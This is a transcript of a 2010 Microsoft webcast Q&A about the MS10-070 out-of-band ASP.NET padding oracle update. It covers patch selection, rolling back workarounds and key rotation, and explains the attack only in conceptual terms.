Monthly Security Bulletin Webcast Q&A - September 2010 (Out-of-Band)
Hosts: Dave Forstrom, Director, Trustworthy Computing
Dustin Childs, Senior Security Manager
Chat Topic: September 2010 Out-of-Band Security Bulletin Release
Date: Tuesday, September 28, 2010
Q: The Security Response and Defense Blog (SRD) on Sept 20th has DetectCustomErrorsDisabled.vbs ver 3.1 (2010-09-20), and ScottGu Sept. 18th blog links to script ver 3.0, which is most current and should be used to scan?
A: At this point we recommend moving to installing the MS10-070 update. The VBScript was only relevant for the posted workaround - which is now superseded by the update.
Q: If I apply MS10-070, is this the SAME as doing the workaround (customErrors mode="On") etc ?
A: The bulletin updates supersede the workarounds. The update itself does not implement the workaround. The update addressed the vulnerability by signing all data that is encrypted by ASP.NET.
Q: Will there be a specific update for Microsoft SharePoint? There were different procedures from the Security Advisory for that from the SharePoint developers.
A: SharePoint uses the same public redistributables of the .NET Framework that other customers use, so the updates for the .NET Framework released today will help secure SharePoint customers too. There are no separate updates for SharePoint customers.
Q: Are you familiar with the "Padding Oracle Vulnerability Test" site at http://paddingoracletest.com/ and do you recommend using it?
A: We are aware that this site exists but have no further information about it; and, therefore cannot recommend using it.
Q: Do the updates change the ASP.NET version displayed by IIS Manager Web Service Extensions so we can check here if update applied (faster than Microsoft Baseline Security Analyzer (MBSA) scan)?
A: No, the publically displayed version shown will not provide that information.
Q: Can you back out the Padding Oracle Exploit tool (POET) security update after it is applied?
A: Yes. All updates for the .NET Framework may be uninstalled by using the uninstall option for the update in Add/Remove programs. You may also uninstall the update from the command line <update.exe> /uninstall.
Q: Please discuss the relationship between Secure Socket Layer (SSL) and "Padding Oracle" Do I not have the vulnerability if I have no sites with SSL certificates?
A: The vulnerability is unrelated to SSL. It involves ASP.NET specific usage of encryption - in short any ASP.NET site is affected and should be updated - regardless of whether SSL is being used or not.
Q: Does this vulnerability expose a risk to the Encryption Key? Or does it bypass the need to find the key? If they still have to brute force the key, what is the complexity for the attacker to solve it? Is it a matter of minutes?
A: The vulnerability can be leveraged to get ScriptResource.axd to download web.config - which for many websites contains both the encryption and signing keys for the website.
Q: The base Common Vulnerability Scoring System (CVSS) score is rated a 5 for this vulnerability, why the out-of-band (OOB) release?
A: Microsoft has released out of band for updates rated Moderate, Important and Critical. In this case, an attacker could retrieve files with no user interaction, potentially retrieving private certificates, encryption keys, credentials to other systems, and other sensitive information. In addition, the attacker could tamper with data to cause the server to take unexpected actions. These actions can lead to code execution if certain common web applications are installed. Because the full impact of this vulnerability depends on the web applications installed and the configuration of the server, the vulnerability rating is only a starting point to assessing the impact to any individual system.
Q: What is the risk and attack vector to non-web based servers and workstations with asp.net installed?
A: Machines that have ASP.NET bits installed, but are not running any websites, are not vulnerable. However if those machines subsequently start running active websites, then they will be vulnerable.
Q: Will this threat impact Internet Security & Acceleration Server (ISA) firewalled forms based SharePoint implementations? If so how?
A: The threat affects any use of encrypted state information sent and processed by ASP.NET. Since SharePoint sits on top of ASP.NET, it is affected. Forms authentication cookies are not the primary attack vector and hence any firewall proxying of forms authentication cookies has no effect on stopping the threat.
Q: If ASP.NET is now still sending a code back but it is now a 404 error with custom errors on. Is it a just a bug that aspxerrorpath= in the query string just a bug? And if it is, will it be fixed as it could have more security problems in the future?
A: It is an old behavior of customErrors. We may change the logic in the future to no longer key off of aspxerrorpath when attempting to detect errors being thrown from within the customErrors processing.
Q: Does the MS10-070 security update work with Microsoft Office SharePoint Server 2007 with form-based authentication?
A: Yes, it does.
Q: For Windows Server 2008 R2 do we need to use the Server 2008 SP2 updates?
A: As part of the bulletin MS10-070 we have released individual updates for Windows Vista/Windows Server SP2 and Windows7/Windows Server 2008 R2. You should install the update corresponding to Windows Server 2008 R2 i.e. KB2416471.
Q: When we installed asp.net 4.0, a folder called "aspnet_client" gets created on all the website applications in IIS 7.0. Will an "aspnet_client" folder be created on websites I have in IIS 7.0 if this update is installed?
A: As a side effect of the update installation process aspnet_regiis will run - so yes the folder will get created. However the 4.0 folder will be empty.
Q: In some recent .Net updates we have seen what was expressed as a corruption in meta data that would not allow installing the newest update until the previous update for that version of .Net was removed. Have you seen any of this in your testing or received
A: Microsoft extensively tests all security updates before shipping these broadly to customers but due to the very diverse ecosystem of hardware and software customers use there may be a small number of customers who encounter issues either during or after installing an update. If you see an issue with these updates you can call 1-866-PCSAFETY (1-866-727-2338) for free technical support.
Q: Juliano Rizzo and ThaiDuong refer to a 'Golden Rule of Web Security' in their EkoParty presentation:
Do not keep anything sensitive (Web.Config!) inside the document root.
How do you respond to that statement? What can we do in general to apply to this 'Golden Rule'?
A: Web.config information can be secured in 2.0 (and later) by using protected configuration (http://msdn.microsoft.com/en-us/library/53tyfkaw.aspx). Protected configuration will convert sensitive configuration sections like machineKey into encrypted text. The key information used for the encryption operation is separate and apart from the keys used by the web application.
Q: Is it recommended to change the machineKey after applying the update?
A: Yes - we recommend rolling the keys.
Q: Will existing forms authenticated cookies stop working after this update? That is, will this log out current users?
A: At this time the updates are only available on the Microsoft Download Center, customers will need to download and deploy the updates to machines that need the corresponding updates. We will make these updates available via WU and WSUS beginning in a couple days and at that time the detection logic will ensure that these update are only installed to the applicable machines.
Q: I'm still confused about which versions I would need to install if I'm running Win 2003 32bit, and have installed ASP.net 1.1, then 2.0, then 3.0 and 3.5, then later 3.5 SP1 do I need updates for all of these 1.1, 2.0, 3.5, AND 3.5 SP1?
A: Since you installed 3.5 SP1, you need the 3.5 SP1 update. There are two update for 3.5 SP1 - one update will update the 2.0-layer and the other will update the 3.5 layer. In addition to that you will need the 1.1 update since 1.1 is a different FX version of 3.5 SP1.
Q: I am not confortable about the update sequence installation... For instance, on our SharePoint servers, we have the .NET platform installed from 1.1 through 3.5 SP1... Do I understand that we need to install these updates for every .NET installed platform?
A: That is correct, if you have more than 1 version of the .NET Framework installed then you need to install the updates corresponding to each version you have installed. We recommend you do this by starting from the lowest version and going up to the highest version.
Q: Are there any PowerShell scripts available for discovery of vulnerable systems (that have ASP.NET.)?
A: No there aren't any PowerShell scripts available. The VBScript available on ScottGuthrie's blog can be modified to use PowerShell without a lot of effort.
A: Please see KB318785 for guidance on this determination.
Q: On x64 servers that host 64bit and 32bit web apps, do we apply both x86 and x64 updates or just x64 updates?
A: Only the x64 updates. The x64 updates contain updates to 32-bit binaries as well.
Q: Scott Guthrie's Blog entry states the same download for 2 different framework versions; can you confirm this is not a typo?
A: The same update can apply to more than one operating system. Also, some operating systems and .NET Framework combinations require two update to be installed. The table in Scott Guthrie's Blog is accurate.
Q: We are running Windows 2008 SP1 x64, should we use the Windows 2008 x64 installers?
A: Make sure to use the update that is applicable to your .NET version and platform. If you are running Windows Server 2008 SP1 x64, then you should install the Windows Server 2008 SP1 for x64-based Systems .NET framework packages.
Q: Installation of URL Scan was part of the workarounds. You are now saying to roll back the workarounds. Should we leave URL Scan?
A: You should roll back the aspxerrorpath specific workaround in UrlScan. You may leave UrlScan still installed and running because it provides additional security benefit to your web server. However, some applications like SharePoint have compatibility issues with UrlScan, so you should test to make sure that UrlScan does not have any unexpected impact in your environment.
Q: Is it correct that Unified Access Gateway (UAG) Servers needs to be updated also?
A: Internet Security & Acceleration Sever (ISA) / Unified Access Gateway (UAG) servers do not typically host web servers with ASP.Net on them and as such are not at immediate risk. If these servers have the .NET framework installed, the updates will be installable to update your system though.
Q: With any of these out-of-band (OOB) updates, is there the risk of the behavior described in KB 2307350 and KB 2321027 being encountered?
A: The behavior described in KB2307350 is default behavior for all .NET Framework update so the behavior will occur.
Q: So to get the update from the download center for testing, do we need to download each individual update separately?
A: Yes. To update your system, you will need to download the update that applies to your environment and manually install it.
Q: SharePoint specific - re: http://weblogs.asp.net/scottgu/archive/2010/09/24/update-on-asp-net-vulnerability.aspx -- should the entry be 'errortext=' instead?
A: No. After editing UrlScan.ini that section of the ini file looks like:
; If any character sequences listed here appear in the query
; string for any request, that request will be rejected.
Q: Will there be a specific update for SharePoint? There were different procedures in the Security Advisory for that from the SharePoint developers.
A: SharePoint uses the same public redistributables of the .NET Framework that other customers use, so the update for the .NET Framework released today will help secure SharePoint customers, too. There is not a separate update for SharePoint customers.
Q: Can the update affect internal encryption use with specific asp.net features? For example, the membership provider with password recovery on?
A: Membership password encryption behavior is not modified by any of the update. Only transient state is affected by this update: cookie encryption, query-string values, and viewstate.
Q: Does the update change the ASP.NET version displayed by IIS Manager Web Service Extensions so we can check here if update applied (faster than MBSA scan)?
A: No - the version shown is only to the third digit; which does not revise due to the update.
Q: Is there a difference in protection between the published workarounds (including URLScan) and the update?
A: The released update supersedes the workaround. All workarounds can be backed out once the update is installed.
Q: I have been trying to sync up this out-of-band (OOB) with my Windows Server Update Services (WSUS) 3.0 console. Is this bulletin not supported by WSUS 3.0?
A: This update is only available to the download center today, but it will be available to Windows Server Update Services (WSUS) 3.0 later this week when we release it to all of our automatic update tool sets.
Q: If the update for .NET 2.0 service pack 2 is installed on .net 2.0 service pack 1, will this break .NET? Will this secure the system?
A: The update corresponding to .NET Framework 2.0 SP2 should only be installed on machines with the particular version present, you should not install update where you do not have the corresponding product installed. Doing so may leave the computer in an inconsistent or unpredictable state.
Q: Can you clarify the functionality changed in IIS? I need to understand what portions of my applications need to be retested after I install this update. Knowing what changed in IIS will assist me in that analysis.
A: There was no change in IIS functionality. The update is targeted to ASP.NET specifically. The main change is that portions of the web application that previously used encryption now use signing in addition to encryption. This applies to viewstate and forms authentication cookie encryption among others.
Q: If I have .NET 3.5.1 and 4.0 on the same system would I need both update?
A: Yes, you must apply both update.
Q: Is the update cumulative, or do I (for example) have to install updates for 1.1 SP1, 2.0 SP2, 3.5, *AND* 3.5 SP1? in order?
A: Yes. If you have multiple versions of the .NET Framework installed then you should install the update corresponding to all versions.
Q: Would an Exchange Front End server running IIS and publishing OWA through ISA server be affected from the outside?
A: Yes, you would be affected. If you implemented specific filters in your firewall to track 500 error responses, you could use this to deter a malicious client, but this would not be considered a workaround. You should be applying the security update in this environment.
Q: How does this impact Web services using Web Services Enhancements (WSE 3.0)?
A: Although web service code itself is not attackable, since web services are hosted in ASP.NET, unless steps were taken to strip down the module and handler list of the web service application to only include asmx/svc handlers - the application is still vulnerable.
Q: Are the downloads smart enough to know if they are needed to install? That is, if it's not needed on the PC will it flag and not install on that pc?
A: At this time the update is only available via the Download Center so customers would need to download and deploy the update to the appropriate machines. When this update is available via Windows Update (WU) and WSUS in the future the detection logic will ensure the update is only installed on the machines that need them.
Q: Will existing forms authentication cookies stop working after this update? That is, will this log out current users?
A: Yes. The update need to be installed across all servers in a cluster. After the update is installed, the forms authentication cookie will be in somewhat different format - and thus older cookies will no longer work. Users logged in with "remember me" functionality will need to login again.
Q: Is there an extra workaround that can be applied to Threat Management Gateway (TMG) / ISA Server filtering
A: ISA and other firewall filters cannot be used to work-around this issue. At best they can be used as a deterrent to slow a malicious client.
Q: Should these updates be applied on all internal network servers even though they are not exposed in the demilitarized zone (DMZ)?
A: You should prioritize installation on servers exposed to the demilitarized zone (DMZ). There is still an insider threat that would need to be addressed with this vulnerability, and intranet servers should be updated to address this.
Q: How are SQL Reporting Services affected, which runs on IIS and ASP.NET 1.1, but is generally a fragile installation?
A: We recommend installing the 1.1 update because SSRS running on ASP.NET1.1 still has the based ASP.NET product installed and running.
Q: Can you please elaborate on how the encryption padding is used during the exploit? Are the error codes described actually used as encryption padding?
A: The attacker repeatedly guesses at initialization vector values to try to produce valid padding, using the different error codes to tell when a guess is accurate. A different error code is returned when the padding is correct than when it isn't, allowing the attacker to tell when a guess is correct. By repeatedly using this technique, the attacker can determine the initialization vector and eventually reverse the encryption.
Q: Will this have an impact on the web applications themselves? (homegrown or otherwise?)
A: If an attacker downloads the application's web.config, then depending on what the application itself allows in terms of remote editing it could be possible to further compromise the application.
Q: Does this vulnerability create any opportunities for an attacker to exploit remote code execution or escalation of privilege?
A: Potentially yes - it depends on whether or not the web application has additional functionality like administration modules which themselves allow tasks like administrative-upload of code.
Q: SBS 2003 by default runs WSS 2.0 and ASP.NET 1.1. The Microsoft SharePoint Team Blog on this advisory says that sites running ASP.NET 1.1 are not affected. Does this mean that Windows Small Business Server (SBS 2003) servers that have not had WSS upgraded or the web sites (or directories) switched from ASP.NET 1.1 (or do not have other vulnerable applications installed) are not vulnerable, do not need the workaround, and do not need the update to be released on September 28, 2010?
A: If there are any active ASP.NET 1.1 sites, the update should be installed. Also the SharePoint team updated their blog post recently to include SharePoint 3.0 as being affected - so yes the update still needs to be installed.
Q: I am supporting a customer who wants to know how extensive the OOB update is that makes it unnecessary to implement the work-around referenced last week. What guidance do we give for how to test the out-of-band (OOB) release?
A: The OOB update makes fundamental changes to ASP.NET encryption to include signing and verification of all encrypted data. That change shuts down all padding oracle attack vectors.
Q: The recommended workaround is to use the web.config custom errors setting to redirect to a generic error page. Will using the error handler in the Global.asax to redirect all errors to a generic error page also be an acceptable workaround?
A: At this point customers should move as quickly as possible to install the update - at which point all workarounds can be backed out.
Q: What are Microsoft's recommendations for deployment of this update to large developer environments to commence testing prior to the update being made available via the normal distribution channels?
A: Microsoft extensively tests all security updates before releasing them, but we always recommend customers test these environments with their applications in the environment. Due to the nature of the vulnerability we do not recommend waiting for the availability on WU/WSUS, we recommend you install the updates as soon as possible.
Q: Please list all Microsoft products that use ASP.NET in MS10-070, Exchange OWA and SharePoint are mentioned, but CRM hotfix 2416728 is not listed.
A: MS10-070 addresses the underlying vulnerability in ASP.net. Products utilizing ASP.net will be protected after this update is installed and do not require additional customer action.
Q: Windows Home Server wasn't listed in the MS10-070 bulletin; hoping to hear a comment about which Server 2003 update to use.
A: Windows Home Server is based on the Windows Server 2003 codebase but ships with the .NET Framework 3.5 SP1 so you should refer to the updates for .NET Framework 3.5 SP1 in order to help secure the system.
Q: Is there an article that lists a list of DLL's that were updated for this hotfix?
A: The KB articles corresponding to each update list the files being replaced by the particular update.
Q: Are there specific areas we should focus post update application testing on?
A: The update makes changes to the encrypted formats of forms authentication cookies, role manager cookies, viewstate, and Urls generated for use by webresource.axd/scriptresource.axd. If your application uses any of those features, those features would be good choices to focus testing on.
Q: My understanding is that the ability to access files such as web.config limited to .Net 3.5.1 sites and later. Is there a means to determine if this has already been exploited?
A: No there isn't. If there is a concern we recommend changing the encryption and validation keys in web.config.
Q: If our web infrastructure is behind an ISA 2006 server and the ISA server is publishing our web infrastructure, will ISA provide any protection from this vulnerability?
Q: Can we now continue to use the standard "An error occurred while processing your request." error?
A: You can back out any changes to customErrors that were made previously and return back to your previous configuration/code that you used for handling errors.
Q: Can we undo the changes done on the servers per the published workarounds after the update is installed?
A: Yes. You can back out any changes to customErrors that were made previously and return back to your previous configuration/code that you used for handling errors.
Q: Is information from the cookies also vulnerable?
A: Potentially yes. The padding oracle attack is a class of attack made on encrypted state - since some ASP.NET cookies are encrypted they are vulnerable to the attack.
Q: What are Microsoft's recommendations for deployment of this update to large dev environments to commence testing prior to the update being made available via the normal distribution channels?
A: Web servers with ASP.NET enabled are at the highest risk from this vulnerability. Systems that are not running Web services with ASP.NET enabled are not vulnerable, however vulnerable files exist in the systems listed in the Affected Software section in this bulletin.
A: If machines only have ASP.NET bits on them, but do not actively serve ASP.NET pages/websites, and are not used for developing ASP.NET code, then there is no urgency to apply the patch.
Q: Is there a way to disable file exfiltration feature in ASP.NET?
A: If an application does not make use of ASP.NET AJAX features, the ScriptResource.axd handler can be removed from the handler list. For classic mode the handler can be removed from the system.web/httpHandlers section. For IIS7/7.5 integrated mode the handler can be removed from the system.webServer/handlers list. Note though that most ASP.NET AJAX applications typically end up using ScriptResource.axd on one or more pages in an application. Before removing the handler you should test your ASP.NET application to ensure that it doesn't break when the ScriptResource handler is removed.